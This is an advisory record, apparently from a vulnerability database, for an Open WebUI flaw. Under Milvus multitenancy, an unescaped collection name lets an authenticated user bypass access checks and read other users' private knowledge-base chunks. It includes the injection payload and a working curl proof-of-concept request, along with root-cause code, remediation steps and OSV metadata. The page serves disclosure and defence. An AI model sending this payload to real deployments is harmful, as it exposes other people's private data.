PYSEC-2026-2750
Vulnerability from pysec - Published: 2026-07-13 15:46 - Updated: 2026-07-13 16:05RAG ACL Bypass in Milvus Multitenancy Mode
Summary
This is a bypass of the fix for:
- GHSA-h36f-rqpx-j5wx
- CVE-2026-44560
- "Unauthorized File and Knowledge Base Content Access via RAG Vector Search"
Open WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a resource_id and is interpolated into a Milvus expression without escaping.
An authenticated non-admin user can query:
x' or resource_id != '' or resource_id == 'x
This passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:
resource_id == 'x' or resource_id != '' or resource_id == 'x'
That returns private knowledge-base chunks belonging to other users.
Affected Configuration
Tested on:
Open WebUI: v0.9.5, commit 3660bc00f
VECTOR_DB=milvus
ENABLE_MILVUS_MULTITENANCY_MODE=true
This is not a default-vector-store issue. It affects production deployments using Milvus multitenancy.
Impact
An authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.
Root Cause
ACL permits unknown collection names:
# backend/open_webui/retrieval/utils.py
elif not await Knowledges.get_knowledge_by_id(name):
validated.add(name)
Milvus multitenancy then treats the same name as resource_id and builds unsafe expressions:
# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py
expr=f"{RESOURCE_ID_FIELD} == '{resource_id}'"
Affected paths include:
POST /api/v1/retrieval/query/collection
POST /api/v1/retrieval/query/doc
PoC
Request:
curl -s -X POST "$TARGET/api/v1/retrieval/query/collection" \
-H "Authorization: Bearer $ATTACKER_TOKEN" \
-H "Content-Type: application/json" \
--data-binary @- <<'JSON'
{
"collection_names": [
"x' or resource_id != '' or resource_id == 'x"
],
"query": "anything",
"k": 10,
"hybrid": false
}
JSON
Actual result: private chunks from other users' knowledge collections are returned.
Expected result: request should be rejected with 403 or return no unauthorized content.
Remediation
- Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.
- Escape or parameterize Milvus expression values before building filters.
- Reject collection names containing quotes/control characters unless they match a known internal format.
- Add a regression test for this payload in Milvus multitenancy mode:
x' or resource_id != '' or resource_id == 'x
| Name | purl | open-webui | pkg:pypi/open-webui |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "open-webui",
"purl": "pkg:pypi/open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.6"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.1.124",
"0.1.125",
"0.2.0",
"0.2.1",
"0.2.2",
"0.2.3",
"0.2.4",
"0.2.5",
"0.3.0",
"0.3.1",
"0.3.10",
"0.3.12",
"0.3.13",
"0.3.14",
"0.3.15",
"0.3.16",
"0.3.17",
"0.3.17.dev2",
"0.3.17.dev3",
"0.3.17.dev4",
"0.3.17.dev5",
"0.3.18",
"0.3.19",
"0.3.2",
"0.3.20",
"0.3.21",
"0.3.22",
"0.3.23",
"0.3.24",
"0.3.25",
"0.3.26",
"0.3.27",
"0.3.27.dev1",
"0.3.27.dev2",
"0.3.27.dev3",
"0.3.28",
"0.3.29",
"0.3.3",
"0.3.30",
"0.3.30.dev1",
"0.3.30.dev2",
"0.3.31",
"0.3.31.dev1",
"0.3.32",
"0.3.33",
"0.3.33.dev1",
"0.3.34",
"0.3.35",
"0.3.4",
"0.3.5",
"0.3.6",
"0.3.7",
"0.3.8",
"0.3.9",
"0.4.0",
"0.4.0.dev1",
"0.4.0.dev2",
"0.4.1",
"0.4.2",
"0.4.3",
"0.4.4",
"0.4.5",
"0.4.6",
"0.4.6.dev1",
"0.4.7",
"0.4.8",
"0.5.0",
"0.5.0.dev1",
"0.5.0.dev2",
"0.5.1",
"0.5.10",
"0.5.11",
"0.5.12",
"0.5.13",
"0.5.14",
"0.5.15",
"0.5.16",
"0.5.17",
"0.5.18",
"0.5.19",
"0.5.2",
"0.5.20",
"0.5.3",
"0.5.3.dev1",
"0.5.4",
"0.5.5",
"0.5.6",
"0.5.7",
"0.5.8",
"0.5.9",
"0.6.0",
"0.6.1",
"0.6.10",
"0.6.11",
"0.6.12",
"0.6.13",
"0.6.14",
"0.6.15",
"0.6.16",
"0.6.18",
"0.6.19",
"0.6.2",
"0.6.20",
"0.6.21",
"0.6.22",
"0.6.23",
"0.6.24",
"0.6.25",
"0.6.26",
"0.6.26.dev1",
"0.6.27",
"0.6.28",
"0.6.29",
"0.6.3",
"0.6.30",
"0.6.31",
"0.6.32",
"0.6.33",
"0.6.34",
"0.6.35",
"0.6.36",
"0.6.37",
"0.6.38",
"0.6.39",
"0.6.4",
"0.6.40",
"0.6.41",
"0.6.42",
"0.6.43",
"0.6.5",
"0.6.6",
"0.6.6.dev1",
"0.6.7",
"0.6.8",
"0.6.9",
"0.7.0",
"0.7.1",
"0.7.2",
"0.8.0",
"0.8.1",
"0.8.10",
"0.8.11",
"0.8.12",
"0.8.2",
"0.8.3",
"0.8.4",
"0.8.5",
"0.8.6",
"0.8.7",
"0.8.8",
"0.8.9",
"0.9.0",
"0.9.1",
"0.9.2",
"0.9.3",
"0.9.4",
"0.9.5"
]
}
],
"aliases": [
"CVE-2026-54019",
"GHSA-p5cp-r7rg-qpxc"
],
"details": "# RAG ACL Bypass in Milvus Multitenancy Mode\n\n## Summary\n\nThis is a bypass of the fix for:\n\n- GHSA-h36f-rqpx-j5wx\n- CVE-2026-44560\n- \"Unauthorized File and Knowledge Base Content Access via RAG Vector Search\"\n\nOpen WebUI added collection-level ACL checks, but the patch can still be bypassed when Milvus multitenancy mode is enabled. The ACL allows unknown non-KB collection names as legacy/ephemeral collections. In Milvus multitenancy mode, that user-controlled collection name becomes a `resource_id` and is interpolated into a Milvus expression without escaping.\n\nAn authenticated non-admin user can query:\n\n```text\nx\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\n```\n\nThis passes the Open WebUI ACL as an unknown collection, but Milvus evaluates:\n\n```text\nresource_id == \u0027x\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\u0027\n```\n\nThat returns private knowledge-base chunks belonging to other users.\n\n## Affected Configuration\n\nTested on:\n\n```text\nOpen WebUI: v0.9.5, commit 3660bc00f\nVECTOR_DB=milvus\nENABLE_MILVUS_MULTITENANCY_MODE=true\n```\n\nThis is **not a default-vector-store issue**. It affects **production deployments using Milvus multitenancy.**\n\n## Impact\n\nAn authenticated low-privilege user can read private RAG / knowledge-base content they do not have access to. No victim interaction is required.\n\n## Root Cause\n\nACL permits unknown collection names:\n\n```python\n# backend/open_webui/retrieval/utils.py\nelif not await Knowledges.get_knowledge_by_id(name):\n validated.add(name)\n```\n\nMilvus multitenancy then treats the same name as `resource_id` and builds unsafe expressions:\n\n```python\n# backend/open_webui/retrieval/vector/dbs/milvus_multitenancy.py\nexpr=f\"{RESOURCE_ID_FIELD} == \u0027{resource_id}\u0027\"\n```\n\nAffected paths include:\n\n```text\nPOST /api/v1/retrieval/query/collection\nPOST /api/v1/retrieval/query/doc\n```\n\n## PoC\n\nRequest:\n\n```bash\ncurl -s -X POST \"$TARGET/api/v1/retrieval/query/collection\" \\\n -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n --data-binary @- \u003c\u003c\u0027JSON\u0027\n{\n \"collection_names\": [\n \"x\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\"\n ],\n \"query\": \"anything\",\n \"k\": 10,\n \"hybrid\": false\n}\nJSON\n```\n\nActual result: private chunks from other users\u0027 knowledge collections are returned.\n\nExpected result: request should be rejected with 403 or return no unauthorized content.\n\n## Remediation\n\n1. Do not allow arbitrary unknown collection names in user-controlled RAG query endpoints.\n2. Escape or parameterize Milvus expression values before building filters.\n3. Reject collection names containing quotes/control characters unless they match a known internal format.\n4. Add a regression test for this payload in Milvus multitenancy mode:\n\n```text\nx\u0027 or resource_id != \u0027\u0027 or resource_id == \u0027x\n```",
"id": "PYSEC-2026-2750",
"modified": "2026-07-13T16:05:14.322014Z",
"published": "2026-07-13T15:46:19.863485Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-p5cp-r7rg-qpxc"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/open-webui"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-p5cp-r7rg-qpxc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54019"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: RAG ACL Bypass in Milvus Multitenancy Mode"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.